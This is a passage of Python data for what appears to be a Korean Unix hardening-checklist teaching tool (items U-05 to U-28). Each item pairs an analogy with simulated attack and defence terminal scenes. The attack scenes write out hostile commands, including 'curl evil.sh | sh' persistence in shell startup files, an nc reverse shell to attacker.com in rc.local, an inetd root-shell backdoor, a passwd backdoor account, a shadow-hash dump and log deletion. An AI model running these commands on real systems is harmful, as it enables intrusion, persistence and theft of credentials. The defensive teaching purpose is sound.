   'attack_secure': [
     ['cmt', '# 점검: UID 0 계정 나열'],
     ['prompt', '# awk -F: "$3==0 {print $1}" /etc/passwd'],
     ['good', 'root'],
     ['warn', '>> UID 0은 root 단 하나 — 백도어 계정 존재하지 않음'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '점검 통과 — root 단일', 'desc': 'UID 0이 root 하나뿐이라 권한 위장·은신 경로가 없습니다.'},
 },
 'U-06': {
   'easy': '아무 직원이나 <b>사장실 열쇠 구멍에 번호를 계속 입력해 보는 것</b>을 막는 규칙입니다. su(사장실 입장)는 승인된 관리자 그룹(wheel)만 시도할 수 있어야 하고, 시도 기록도 남아야 합니다.',
   'attack_label': '일반 사용자 계정을 뚫은 공격자가 su로 root 전환을 시도한다',
   'attack_vuln': [
     ['cmt', '# 탈취한 일반 계정에서 root로 전환 시도'],
     ['prompt', 'user01$ su - root'],
     ['', 'Password: (대입 시도 1...) Password: (대입 시도 2...)'],
     ['bad', '>> su 사용 제한 없음 — 누구나 시도 가능'],
     ['bad', '>> 6번째 시도: 전환 성공 — root 획득'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 권한 상승', 'desc': 'su가 전원에게 열려 있어 일반 계정만 뚫려도 root까지 올라탈 수 있습니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 su 시도'],
     ['prompt', 'user01$ su - root'],
     ['good', '>> pam_wheel: user01은 wheel 그룹 아님 — 거부'],
     ['good', '>> 시도 기록이 /var/log/secure에 남아 탐지됨'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — wheel 그룹 제한', 'desc': 'su가 승인된 관리자(wheel)에게만 허용되고 시도 자체가 로그로 남습니다.'},
 },
})

# ===== 파일 및 디렉터리 관리 (U-14~U-28) =====
DYN.update({
 'U-14': {
   'easy': '사장 책상 서랍이 <b>잠금 없이 복도에 놓인 것</b>(root 홈 755)과 같습니다. 게다가 안내 방송이 "지금 서 있는 곳부터 찾으세요"(PATH에 현재 폴더)라고 하죠. 공격자는 서랍의 메모(.bashrc)를 바꿔 사장이 셸을 열 때 원하는 명령을 실행시킵니다.',
   'attack_label': '공격자가 root 홈의 시작 파일을 변조해 명령을 가로챈다',
   'attack_vuln': [
     ['cmt', '# root 홈 디렉터리에 침입해 시작 파일 수정'],
     ['prompt', 'attacker$ ls -ld /root'],
     ['bad', 'drwxr-xr-x /root — 누구나 목록 조회 가능'],
     ['bad', 'attacker$ echo "curl evil.sh | sh" >> /root/.bashrc'],
     ['bad', '>> 다음 root 로그인 시 악성 명령 자동 실행'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — root 셸 장악', 'desc': '보호되지 않은 홈 디렉터리의 시작 파일이 변조되어 root 명령이 가로채입니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ echo "curl evil.sh | sh" >> /root/.bashrc'],
     ['good', '>> Permission denied — /root는 700(root만)'],
     ['good', '>> PATH에 현재 디렉터리(.)도 없어 위장 명령 무효'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 홈 보호·경로 정리', 'desc': 'root 홈 700과 PATH 정리로 시작 파일 변조·명령 위장이 모두 막힙니다.'},
 },
 'U-15': {
   'easy': '이삿짐 센터에 <b>명의를 알 수 없는 소포</b>가 쌓여 있는 상황입니다. 보낸 사람(소유 계정)이 삭제된 파일은 아무도 관리하지 않는 사각지대가 되어, 공격자가 자기 물건으로 위장해 두기 좋습니다.',
   'attack_label': '공격자가 소유자 없는 파일을 찾아 악성 도구로 활용한다',
   'attack_vuln': [
     ['cmt', '# 소유자 없는 파일 검색'],
     ['prompt', 'attacker$ find / -nouser -o -nogroup 2>/dev/null'],
     ['bad', '/var/spool/mail/ghost   (계정 삭제됨, 권한 777)'],
     ['bad', '/opt/legacy/bin/tool   (그룹 없음)'],
     ['bad', '>> 관리되지 않는 파일에 백도어 설치 — 발견 어려움'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 사각지대 악용', 'desc': '소유자 없는 파일은 점검 대상에서 빠져 공격자의 은신처로 쓰입니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 검색'],
     ['prompt', '# find / -nouser -o -nogroup 2>/dev/null'],
     ['good', '(출력 없음)'],
     ['good', '>> 모든 파일의 소유자·그룹이 확인됨'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '점검 통과 — 사각지대 없음', 'desc': '소유자 없는 파일이 없어 미관리 파일을 이용한 은신이 불가능합니다.'},
 },
 'U-16': {
   'easy': '회사 <b>전화번호부(계정 목록)를 아무나 지우고 고칠 수 있게</b> 게시해 둔 것입니다. 공격자는 몰래 "신입 사원 자리"를 하나 추가해 두고, 그 자리로 출근합니다.',
   'attack_label': '공격자가 passwd 파일을 직접 수정해 계정을 추가한다',
   'attack_vuln': [
     ['cmt', '# passwd 파일 권한 확인 후 수정 시도'],
     ['prompt', 'attacker$ ls -l /etc/passwd && echo "bkd:x:2000:2000::/tmp:/bin/bash" >> /etc/passwd'],
     ['bad', '-rw-rw-rw- 1 root root /etc/passwd'],
     ['bad', '>> 일반 사용자도 쓰기 가능 — 계정 추가 성공'],
     ['bad', '>> attacker$ su bkd — 상주 계정 확보'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 백도어 계정 추가', 'desc': '계정 목록 파일이 임의 수정 가능하여 공격자가 상주 계정을 심습니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 수정 시도'],
     ['prompt', 'attacker$ echo "bkd:..." >> /etc/passwd'],
     ['good', '-rw-r--r-- 1 root root /etc/passwd'],
     ['good', '>> Permission denied — root만 수정 가능'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 쓰기 보호', 'desc': '644(root 소유)로 잠겨 계정 추가가 불가능합니다.'},
 },
 'U-17': {
   'easy': '건물 <b>비상시 작동 절차서를 아무나 고칠 수 있게</b> 걸어 둔 것입니다. 다음 점검(재부팅) 때 절차서대로 "전체 문 열기"가 실행되죠. 부팅 스크립트는 재부팅 순간 root 권한으로 실행됩니다.',
   'attack_label': '공격자가 시작 스크립트에 악성 명령을 심어 재부팅 시 실행시킨다',
   'attack_vuln': [
     ['cmt', '# 시작 스크립트 권한 확인 후 변조'],
     ['prompt', 'attacker$ ls -l /etc/rc.d/init.d/network'],
     ['bad', '-rwxrwxrwx 1 root root ... network'],
     ['bad', 'attacker$ echo "nc attacker.com 4444 -e /bin/sh" >> /etc/rc.d/rc.local'],
     ['bad', '>> 관리자 재부팅 시 역방향 셸이 root 권한으로 실행'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 재부팅 시 역방향 셸', 'desc': '부팅 스크립트가 변조되어 재부팅하는 순간 공격자가 root 권한을 받습니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ echo "nc ..." >> /etc/rc.d/rc.local'],
     ['good', '-rwxr-x--- 1 root root (750)'],
     ['good', '>> Permission denied — root만 수정 가능'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 부팅 경로 보호', 'desc': '시작 스크립트가 root 소유 750으로 잠겨 변조가 막힙니다.'},
 },
 'U-18': {
   'easy': '<b>금고 비밀번호가 적힌 쪽지가 게시판에 붙어 있는 것</b>입니다. /etc/shadow가 644면 비밀번호 해시(쪽지)를 모든 사람이 읽을 수 있고, 공격자는 사진 찍어 두고 천천히 한 명씩 풀어봅니다.',
   'attack_label': '공격자가 shadow 파일을 읽어 전 계정 해시를 덤프한다',
   'attack_vuln': [
     ['cmt', '# shadow 권한 확인 후 덤프'],
     ['prompt', 'user01$ ls -l /etc/shadow && cat /etc/shadow'],
     ['bad', '-rw-r--r-- 1 root root /etc/shadow'],
     ['bad', 'root:$6$x4Tg...:...  (전 계정 해시 확보)'],
     ['bad', '>> GPU 대입: dba=Oracle123, app=P@ssw0rd ... 해독 진행'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 해시 덤프·해독', 'desc': '해시 파일이 일반 사용자에게 읽혀 전 계정의 비밀번호가 풀려 나갑니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 읽기 시도'],
     ['prompt', 'user01$ cat /etc/shadow'],
     ['good', '-r-------- 1 root root /etc/shadow'],
     ['good', '>> Permission denied — root만 읽기 가능'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 해시 금고 보호', 'desc': '400 권한으로 root만 읽을 수 있어 해시 덤프가 원천 차단됩니다.'},
 },
 'U-19': {
   'easy': '회사 <b>내부 주소록을 아무나 고쳐서 택배가 공격자 집으로 배달되게</b> 하는 것입니다. /etc/hosts는 DNS보다 먼저 적용되므로, "은행 = 공격자 서버"로 바꿔치기하면 로그인 정보가 엉뚱한 곳으로 갑니다.',
   'attack_label': '공격자가 hosts 파일을 변조해 은행·관리 사이트를 가짜 서버로 보낸다',
   'attack_vuln': [
     ['cmt', '# hosts 권한 확인 후 매핑 변조'],
     ['prompt', 'attacker$ ls -l /etc/hosts && vi /etc/hosts'],
     ['bad', '-rw-rw-rw- 1 root root /etc/hosts'],
     ['bad', '10.99.9.9  bank.example.com  ← 가짜 서버 매핑 추가'],
     ['bad', '>> 사용자가 은행 사이트 접속 → 공격자 서버로 접속'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 로컬 피싱', 'desc': 'hosts가 임의 수정되어 신뢰 사이트 트래픽이 공격자 서버로 향합니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ vi /etc/hosts'],
     ['good', '-rw-r--r-- 1 root root /etc/hosts (644)'],
     ['good', '>> Permission denied — root만 수정 가능'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 주소록 보호', 'desc': '644로 잠겨 도메인 매핑 변조가 불가능합니다.'},
 },
 'U-20': {
   'easy': '<b>청구 업무 규칙집을 아무나 수정</b>할 수 있게 둔 것입니다. inetd.conf는 어떤 서비스를 열지 정하는 규칙집이라, 공격자가 몰래 "야간 창구(악성 서비스)"를 등록해 두면 다음 재시작 때 열립니다.',
   'attack_label': '공격자가 inetd 설정에 악성 서비스를 등록한다',
   'attack_vuln': [
     ['cmt', '# inetd.conf 변조 시도'],
     ['prompt', 'attacker$ echo "backdoor stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf'],
     ['bad', '-rw-rw-rw- 1 root root /etc/inetd.conf'],
     ['bad', '>> 설정에 root 셸 서비스 등록 성공'],
     ['bad', '>> inetd 재시작 후 4444포트로 root 셸 접속 가능'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 서비스 등록', 'desc': '설정 파일이 임의 수정 가능하여 재시작 시 root 권한 서비스가 열립니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 등록 시도'],
     ['prompt', 'attacker$ echo "backdoor ..." >> /etc/inetd.conf'],
     ['good', '-rw-r----- 1 root root (640)'],
     ['good', '>> Permission denied — 등록 불가'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 설정 보호', 'desc': '640 권한으로 서비스 등록 변조가 막힙니다.'},
 },
 'U-21': {
   'easy': '<b>CCTV가 어디에 저장되는지 정한 설정을 아무나 바꿔</b> 두는 것입니다. 공격자는 녹화 위치를 휴지통으로 바꿔 놓고 침입 흔적을 지웁니다. 로그 설정(rsyslog.conf)이 보호되어야 증거가 남습니다.',
   'attack_label': '공격자가 로그 설정을 끊어 침입 흔적을 지운다',
   'attack_vuln': [
     ['cmt', '# 로그 설정 변조 후 침입'],
     ['prompt', 'attacker$ sed -i "s/^*.info/#&/" /etc/rsyslog.conf'],
     ['bad', '-rw-rw-rw- 1 root root /etc/rsyslog.conf'],
     ['bad', '>> info 레벨 로깅 중단 — 이후 작업 기록 안 남음'],
     ['bad', '>> rm /var/log/secure — 흔적 삭제 후 로그아웃'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 증거 인멸', 'desc': '로그 설정이 변조되어 침입 사실 자체가 기록되지 않습니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ vi /etc/rsyslog.conf'],
     ['good', '-rw-r----- 1 root root (640)'],
     ['good', '>> Permission denied — 설정 변경 불가'],
     ['good', '>> 모든 작업이 원격 로그 서버에도 실시간 전송됨'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 로그 보존', 'desc': '설정 보호와 원격 로그 이중화로 흔적 삭제가 불가능합니다.'},
 },
 'U-22': {
   'easy': '<b>내선번호 안내판을 아무나 바꿔</b> 경리팀 전화를 공격자 책상으로 돌리는 것입니다. /etc/services는 포트-서비스 매핑 안내판이라, 변조되면 보안 장비 판단과 서비스 동작이 흐트러집니다.',
   'attack_label': '공격자가 포트 매핑을 변조해 통신을 가로챈다',
   'attack_vuln': [
     ['cmt', '# services 파일 변조'],
     ['prompt', 'attacker$ echo "www 8443/tcp  # redirected" >> /etc/services'],
     ['bad', '-rw-rw-rw- 1 root root /etc/services'],
     ['bad', '>> 서비스-포트 매핑이 바뀌어 방화벽 정책 우회'],
     ['bad', '>> 일부 프로그램이 공격자 포트로 통신'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 포트 위장', 'desc': '매핑 변조로 서비스가 의도치 않은 포트를 타고 방화벽을 우회합니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ vi /etc/services'],
     ['good', '-rw-r--r-- 1 root root (644)'],
     ['good', '>> Permission denied — root만 수정'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 매핑 보호', 'desc': '644로 잠겨 포트 매핑 변조가 불가능합니다.'},
 },
 'U-23': {
   'easy': '사무실 곳골마다 <b>"이 문은 누가 쓰든 사장 권한으로 열리는" 만능키</b>가 걸려 있는 상황입니다. SUID가 붙은 파일은 실행한 사람 누구에게나 소유자(root) 권한을 줍니다. 하나하나 꼭 필요한지만 남겨야 합니다.',
   'attack_label': '공격자가 방치된 SUID 파일을 이용해 root 권한을 얻는다',
   'attack_vuln': [
     ['cmt', '# SUID 파일 목록 확인'],
     ['prompt', 'attacker$ find / -perm -4000 -type f 2>/dev/null'],
     ['bad', '/usr/bin/old-backup  (root SUID — 사용 중단 도구)'],
     ['bad', '/tmp/collector      (root SUID — 권한 버그 있음)'],
     ['bad', '>> old-backup의 경로 조작 버그로 root 셸 획득'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 권한 상승 사다리', 'desc': '불필요한 SUID 파일이 권한 상승의 발판으로 쓰입니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 검색 — 승인 목록과 비교'],
     ['prompt', '# find / -perm -4000 -type f | diff approved.txt -'],
     ['good', '(차이 없음 — 승인된 SUID만 존재)'],
     ['good', '>> 새 SUID 생성 시 즉시 알림 발생'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '점검 통과 — 만능키 최소화', 'desc': 'SUID가 승인 목록으로 관리되어 권한 상승 경로가 최소화됩니다.'},
 },
 'U-24': {
   'easy': '각자 사물함의 <b>업무 매뉴얼을 다른 사람이 몰래 고쳐 두는 것</b>입니다. .bash_profile은 로그인할 때마다 읽는 매뉴얼이라, 공격자가 한 줄 심어 두면 그 사람은 매일 출근(로그인)할 때마다 공격자 명령을 실행합니다.',
   'attack_label': '공격자가 환경변수 파일에 명령을 심어 로그인 때마다 실행시킨다',
   'attack_vuln': [
     ['cmt', "# 다른 사용자의 시작 파일 변조"],
     ['prompt', 'attacker$ echo "curl evil.sh | sh" >> ~user01/.bash_profile'],
     ['bad', '-rw-rw-rw- 1 user01 user01 .bash_profile'],
     ['bad', '>> 변조 성공 — user01 로그인 시 악성 명령 실행'],
     ['bad', '>> alias ls="curl evil.sh | sh; ls" 위장도 가능'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 로그인 시 감염', 'desc': '시작 파일이 임의 수정되어 피해자가 로그인할 때마다 공격 명령이 돕니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 변조 시도'],
     ['prompt', 'attacker$ echo "..." >> ~user01/.bash_profile'],
     ['good', '-rw------- 1 user01 user01 (600)'],
     ['good', '>> Permission denied — 본인만 수정 가능'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 사물함 잠금', 'desc': '소유자 전용 권한으로 시작 파일 변조가 막힙니다.'},
 },
 'U-25': {
   'easy': '사무실 곳곳에 <b>누구나 마음대로 쓸 수 있는 공용 칠판</b>이 널려 있는 상황입니다. 내용을 몰래 바꿔치기하기 딱 좋죠. world writable 파일은 공격자가 악성 스크립트로 교체하는 즉시 다음 실행자가 감염됩니다.',
   'attack_label': '공격자가 공용 스크립트를 악성 버전으로 바꿔치기한다',
   'attack_vuln': [
     ['cmt', '# 쓰기 가능 파일 확인 후 교체'],
     ['prompt', 'attacker$ ls -l /usr/local/bin/report.sh'],
     ['bad', '-rwxrwxrwx 1 root root report.sh (777)'],
     ['bad', 'attacker$ cp evil.sh /usr/local/bin/report.sh'],
     ['bad', '>> 다음 정각 실행 때 root 권한으로 악성 코드 동작'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 바꿔치기 감염', 'desc': '무단 기입 가능 파일이 악성 버전으로 교체되어 실행자들이 감염됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 교체 시도'],
     ['prompt', 'attacker$ cp evil.sh /usr/local/bin/report.sh'],
     ['good', '-rwxr-xr-x 1 root root report.sh (755)'],
     ['good', '>> Permission denied — root만 수정'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 칠판 제거', 'desc': 'world writable이 제거되어 바꿔치기가 불가능합니다.'},
 },
 'U-26': {
   'easy': '경비실의 <b>모든 장비를 아르바이트생 명의로 등록해 둔 것</b>입니다. /dev의 디스크·메모리 장치는 건물 원본 설계도가 든 금고입니다. 아무나 열 수 있으면 건물 통째로 복사해 갑니다.',
   'attack_label': '공격자가 디스크 디바이스를 직접 읽어 데이터를 통째로 훔친다',
   'attack_vuln': [
     ['cmt', '# 디스크 디바이스 권한 확인'],
     ['prompt', 'user01$ ls -l /dev/sda && dd if=/dev/sda of=/tmp/disk.img'],
     ['bad', 'brw-rw-rw- 1 root disk /dev/sda'],
     ['bad', '>> 디스크 전체 이미지 복사 성공'],
     ['bad', '>> 이미지에서 해시·문서·비밀번호 원본 확보'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 디스크 통째 유출', 'desc': '디바이스가 전원 읽기 가능하여 저장된 모든 데이터가 복사됩니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 복사 시도'],
     ['prompt', 'user01$ dd if=/dev/sda of=/tmp/disk.img'],
     ['good', 'brw-rw---- 1 root disk /dev/sda (660)'],
     ['good', '>> Permission denied — root·disk 그룹만 접근'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 장비 잠금', 'desc': 'root 소유 660으로 디바이스 직접 읽기가 차단됩니다.'},
 },
 'U-27': {
   'easy': '현관에 <b>"아는 사람은 그냥 들어오세요"라는 쪽지</b>를 붙여 둔 것입니다. .rhosts의 "+ +"는 정확히 그 쪽지입니다. 한 대가 뚫리면 그 서버에 적어 둔 모든 서버가 인증 없이 연달아 열립니다.',
   'attack_label': '공격자가 .rhosts 신뢰 목록을 이용해 인증 없이 침입한다',
   'attack_vuln': [
     ['cmt', '# .rhosts 확인 후 rlogin 시도'],
     ['prompt', 'attacker$ rlogin -l root victim.com'],
     ['bad', 'root@victim: cat /root/.rhosts → "+ +"'],
     ['bad', '>> Password: 없이 바로 root 셸 진입'],
     ['bad', '>> 신뢰 목록에 적힌 다른 서버로도 연쇄 침입'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 무인증 연쇄 침입', 'desc': 'rhosts 신뢰로 비밀번호 없이 서버들이 연달아 넘어갑니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 rlogin 시도'],
     ['prompt', 'attacker$ rlogin -l root victim.com'],
     ['good', 'connect: Connection refused'],
     ['good', '>> r 서비스 비활성화 + .rhosts 없음'],
     ['warn', '>> SSH 키 기반 인증만 허용됨'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 신뢰 쪽지 제거', 'desc': '.rhosts 제거와 r 서비스 비활성화로 무인증 경로가 사라집니다.'},
 },
 'U-28': {
   'easy': '안내데스크가 <b>"찾아오는 사람 전원에게 회사 카드를 발급"</b>해 주는 상황입니다. hosts.allow/deny가 비어 있으면 서비스 포트에 누구나 접근을 시도할 수 있죠. 관리망 직원 카드만 발급받도록 명단을 만들어야 합니다.',
   'attack_label': '공격자가 인터넷의 임의 IP에서 관리 서비스를 두드린다',
   'attack_vuln': [
     ['cmt', '# 임의 IP에서 SSH·서비스 포트 접근'],
     ['prompt', 'attacker$ nmap -p 22,23,1521 victim.com'],
     ['bad', '22/tcp  open  ssh   ← 어디서든 접근 허용'],
     ['bad', '23/tcp  open  telnet'],
     ['bad', '>> 출입구 제한 없음 — 대입·취약점 공격 시도 가능'],
   ],
   'outcome_vuln': {'emoji': '🔓', 'title': '공격 성공 — 무차별 접근', 'desc': '접근 제한이 없어 인터넷 어디서든 서비스를 두드릴 수 있습니다.'},
   'attack_secure': [
     ['cmt', '# 동일한 스캔'],
     ['prompt', 'attacker$ nmap -p 22,23,1521 victim.com'],
     ['good', 'hosts.allow: sshd: 10.0.10. (관리망만)'],
     ['good', 'hosts.deny: ALL: ALL (기본 거부)'],
     ['warn', '>> 관리망 외 접속은 즉시 거부'],
   ],
   'outcome_secure': {'emoji': '🛡️', 'title': '공격 차단 — 명단 발급제', 'desc': '허용 IP 명단과 기본 거부 정책으로 관리 서비스가 관리망에만 열립니다.'},
 },
})
